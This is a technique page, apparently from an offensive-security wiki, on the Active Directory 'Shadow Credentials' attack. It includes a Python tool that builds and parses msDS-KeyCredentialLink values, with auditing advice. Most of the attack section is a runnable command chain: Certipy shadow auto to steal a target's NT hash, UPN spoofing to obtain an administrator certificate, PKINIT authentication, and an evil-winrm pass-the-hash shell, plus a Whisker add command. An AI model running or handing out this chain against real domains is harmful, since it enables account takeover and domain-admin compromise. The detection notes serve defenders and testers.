Shadow Credentials
Last modified: 2025-03-15
Shadow Credentials is an attack technique for taking over an Active Directory user or computer account by writing a key credential into the msDS-KeyCredentialLink attribute of the target object, the attribute that Windows Hello for Business key trust uses to store a device's public key.
Exploit
The msDS-KeyCredentialLink attribute holds the public keys (KEY_CREDENTIAL_LINK_BLOB values, stored as DN-Binary) that a domain controller accepts for PKINIT Kerberos pre-authentication; it is normally populated by Windows Hello for Business enrollment. If an attacker can write to that attribute on the target (user or computer account), typically through GenericWrite/GenericAll on the object or WriteProperty on the attribute, they append a key credential for a key pair they control. A DC will then issue a TGT for the account when they pre-authenticate with the matching private key via PKINIT, and a U2U (Kerberos user-to-user) ticket request with that TGT exposes the account's NT hash, all without touching the account's password or the existing credentials.
Prerequisites: at least one DC running Windows Server 2016 or later, and the DC must hold a certificate usable for PKINIT (normally issued by AD CS). The write is not silent: with Directory Service Changes auditing enabled for the object, each modification of msDS-KeyCredentialLink produces event 5136 on the DC.
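To make the attribute concrete, the following is an added Python example (not code from the original page, nor from Whisker or Certipy) that serializes a key credential the same way those tools do, wraps it in the DN-Binary form LDAP stores, and parses such a value back while checking its two integrity hashes. The entry layout and identifiers follow MS-ADTS section 2.2.20; the modulus, DeviceId, owner DN and timestamp are constructed sample values, not a real RSA key.

```python
import hashlib
import struct
import uuid
from datetime import datetime, timedelta, timezone

# Entry identifiers of KEYCREDENTIALLINK_ENTRY (MS-ADTS 2.2.20.3)
KEY_ID, KEY_HASH, KEY_MATERIAL, KEY_USAGE, KEY_SOURCE = 0x01, 0x02, 0x03, 0x04, 0x05
DEVICE_ID, CUSTOM_KEY_INFO, LAST_LOGON_TIME, CREATION_TIME = 0x06, 0x07, 0x08, 0x09

BLOB_VERSION = 0x00000200   # KEY_CREDENTIAL_LINK_BLOB version 2
KEY_USAGE_NGC = 0x01        # "Next Generation Credentials", the usage Whisker/pyWhisker/Certipy write
KEY_SOURCE_AD = 0x00        # key registered in AD (as opposed to Azure AD)
EPOCH_1601 = datetime(1601, 1, 1, tzinfo=timezone.utc)


def to_filetime(dt):
    """Windows FILETIME: 100-ns ticks since 1601-01-01 UTC as little-endian uint64 (integer math, no float rounding)."""
    delta = dt - EPOCH_1601
    ticks = (delta.days * 86400 + delta.seconds) * 10_000_000 + delta.microseconds * 10
    return struct.pack("<Q", ticks)


def from_filetime(raw):
    ticks, = struct.unpack("<Q", raw)
    return EPOCH_1601 + timedelta(microseconds=ticks // 10)


def bcrypt_rsa_public_blob(modulus, exponent):
    """BCRYPT_RSAKEY_BLOB (public variant): 'RSA1' magic, bit length, cbPublicExp, cbModulus,
    cbPrime1 = cbPrime2 = 0, then exponent and modulus as big-endian byte strings."""
    header = b"RSA1" + struct.pack("<IIIII", len(modulus) * 8, len(exponent), len(modulus), 0, 0)
    return header + exponent + modulus


def entry(identifier, value):
    """One KEYCREDENTIALLINK_ENTRY: uint16 length, uint8 identifier, value."""
    return struct.pack("<HB", len(value), identifier) + value


def build_key_credential_link(modulus, exponent, device_id, owner_dn, now):
    """Serialize a key credential as Whisker/DSInternals does and wrap it as the DN-Binary string
    'B:<hex char count>:<hex>:<DN>' that LDAP stores in msDS-KeyCredentialLink."""
    key_material = bcrypt_rsa_public_blob(modulus, exponent)
    tail = (
        entry(KEY_MATERIAL, key_material)
        + entry(KEY_USAGE, bytes([KEY_USAGE_NGC]))
        + entry(KEY_SOURCE, bytes([KEY_SOURCE_AD]))
        + entry(DEVICE_ID, device_id.bytes_le)      # same byte order as .NET Guid.ToByteArray()
        + entry(CUSTOM_KEY_INFO, bytes([1, 0]))     # CUSTOM_KEY_INFORMATION: version 1, no flags
        + entry(LAST_LOGON_TIME, to_filetime(now))
        + entry(CREATION_TIME, to_filetime(now))
    )
    blob = (
        struct.pack("<I", BLOB_VERSION)
        + entry(KEY_ID, hashlib.sha256(key_material).digest())   # v2 KeyID = SHA-256 of the key material
        + entry(KEY_HASH, hashlib.sha256(tail).digest())         # KeyHash = SHA-256 of every entry after it
        + tail
    )
    hex_blob = blob.hex().upper()
    return f"B:{len(hex_blob)}:{hex_blob}:{owner_dn}"


def parse_key_credential_link(value):
    """Parse one msDS-KeyCredentialLink value (as read from LDAP) and verify its integrity hashes."""
    _, hex_len, hex_blob, owner_dn = value.split(":", 3)
    if int(hex_len) != len(hex_blob):
        raise ValueError("DN-Binary length field does not match payload")
    blob = bytes.fromhex(hex_blob)
    version, = struct.unpack_from("<I", blob, 0)
    if version != BLOB_VERSION:
        raise ValueError(f"unsupported blob version {version:#x}")
    entries, offset, hashed_from = {}, 4, None
    while offset < len(blob):
        length, identifier = struct.unpack_from("<HB", blob, offset)
        offset += 3
        entries[identifier] = blob[offset:offset + length]
        offset += length
        if identifier == KEY_HASH:
            hashed_from = offset                   # KeyHash covers everything after its own entry
    key_material = entries[KEY_MATERIAL]
    return {
        "owner_dn": owner_dn,
        "key_id_ok": entries[KEY_ID] == hashlib.sha256(key_material).digest(),
        "key_hash_ok": hashed_from is not None and entries[KEY_HASH] == hashlib.sha256(blob[hashed_from:]).digest(),
        "rsa_bits": struct.unpack_from("<I", key_material, 4)[0],
        "key_usage": entries[KEY_USAGE][0],
        "device_id": str(uuid.UUID(bytes_le=entries[DEVICE_ID])),
        "created": from_filetime(entries[CREATION_TIME]).isoformat(),
    }


def demo():
    """Build a value for a constructed 2048-bit 'key' (fixed bytes, not a real RSA modulus) and parse it back."""
    modulus = hashlib.sha256(b"constructed-demo-modulus").digest() * 8   # 256 bytes = 2048 bits, constructed
    modulus = bytes([modulus[0] | 0x80]) + modulus[1:]                    # top bit set, like a real modulus
    exponent = b"\x01\x00\x01"                                            # 65537
    device_id = uuid.UUID("2b7c9f3e-1a2b-4c5d-8e9f-0a1b2c3d4e5f")        # hypothetical DeviceId
    created = datetime(2025, 3, 15, 12, 0, 0, tzinfo=timezone.utc)
    value = build_key_credential_link(modulus, exponent, device_id, "CN=john,CN=Users,DC=example,DC=local", created)
    return value, parse_key_credential_link(value)


if __name__ == "__main__":
    value, parsed = demo()
    print(value[:80] + "...")
    for k, v in parsed.items():
        print(f"{k}: {v}")
```

For auditing, feed the raw msDS-KeyCredentialLink values of an account into parse_key_credential_link and compare the DeviceId and creation time against the devices that actually enrolled for Windows Hello; a fresh entry on a service account or a computer that never used key trust is the artifact this attack leaves behind. The two hashes only guarantee that a value is internally consistent: the DC does not sign them, so they say nothing about who wrote the entry.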
Using Certipy
# 1. Add a key credential to the target account, authenticate with it via PKINIT and recover the target's NT hash.
#    "auto" generates the key pair, writes msDS-KeyCredentialLink, obtains a TGT and the NT hash, then removes the key credential again.
#    <user> is an account with write access to the target's msDS-KeyCredentialLink; for a computer account pass its sAMAccountName including the trailing $.
certipy shadow auto -u <user>@<domain> -hashes <nt-hash-of-user> -dc-ip <dc-ip> -account <target-user>
# Step 1 alone is enough if the target account itself is the goal. Steps 2-6 turn write access over <target-user> into a certificate for
# administrator: the template copies the requesting account's userPrincipalName into the certificate's SAN, so temporarily setting that UPN
# to "administrator" yields a certificate that maps to the built-in administrator account.
# 2. Set the target account's UPN (User Principal Name) to "administrator"
certipy account update -u <user>@<domain> -hashes <nt-hash-of-user> -dc-ip <dc-ip> -user <target-user> -upn administrator
# (Optional) List templates. Any enabled template that allows client authentication and lets the target enroll (the default "User" template)
# is sufficient; -vulnerable additionally flags misconfigured ones. Note the 'Template Name' and 'Certificate Authorities' values for the next command.
certipy find -u <user>@<domain> -hashes <nt-hash-of-user> -dc-ip <dc-ip> -stdout -vulnerable
# 3. Request a certificate as the target account (its NT hash comes from step 1). Because the UPN is now "administrator", Certipy saves administrator.pfx
certipy req -u <target-user>@<domain> -hashes <nt-hash-of-target-user> -dc-ip <dc-ip> -ca <ca> -template <template>
# 4. Restore the target account's UPN to its original value
certipy account update -u <user>@<domain> -hashes <nt-hash-of-user> -dc-ip <dc-ip> -user <target-user> -upn <target-user>@<domain>
# 5. Authenticate as administrator with the certificate (PKINIT); Certipy prints a TGT and the administrator NT hash
certipy auth -pfx administrator.pfx -domain <domain> -dc-ip <dc-ip>
# 6. Establish a remote WinRM session as administrator using the recovered NT hash
evil-winrm -i <target-ip> -u administrator -H <nt-hash-of-administrator>
# Caveat: on DCs where KB5014754 strong certificate mapping is in Full Enforcement mode, the issued certificate carries the requester's SID in the
# szOID_NTDS_CA_SECURITY_EXT extension and the DC refuses to map it to administrator, so steps 2-6 fail while step 1 still works.
Using Whisker
Whisker is a C# tool for taking over Active Directory user and computer accounts by manipulating their msDS-KeyCredentialLink attribute. The add verb generates a self-signed certificate and key pair, appends the matching key credential to the target, and prints a ready-made Rubeus asktgt command that uses the certificate to obtain a TGT as the target (with /getcredentials, Rubeus also returns the NT hash). The account running Whisker needs write access to the target's msDS-KeyCredentialLink. Whisker also has list, remove (by /deviceid) and clear verbs, so the injected key credential can be removed afterwards instead of being left on the account.
Whisker.exe add /target:john /domain:example.local